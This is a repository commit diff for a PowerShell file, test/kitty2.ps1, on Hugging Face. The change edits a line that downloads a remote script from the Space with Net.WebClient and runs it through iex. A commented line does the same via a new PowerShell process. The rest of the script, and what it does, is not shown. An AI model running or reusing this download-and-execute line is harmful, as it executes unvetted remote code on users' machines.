enotkrutoy commited on
Commit
041b774
·
verified ·
1 Parent(s): 9e08490

Update test/kitty2.ps1

Browse files
Files changed (1) hide show
  1. test/kitty2.ps1 +1 -1
test/kitty2.ps1 CHANGED
@@ -7,7 +7,7 @@
7
  if($host.Name -ne "ConsoleHost")
8
  {
9
  #Start-Process powershell -ArgumentList '-noprofile -noexit -command iex (New-Object Net.WebClient).DownloadString(''https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty2.ps1'')'
10
- iex (New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty2.ps1')
11
  return
12
  }
13
 
 
7
  if($host.Name -ne "ConsoleHost")
8
  {
9
  #Start-Process powershell -ArgumentList '-noprofile -noexit -command iex (New-Object Net.WebClient).DownloadString(''https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty2.ps1'')'
10
+ iex (New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty.ps1')
11
  return
12
  }
13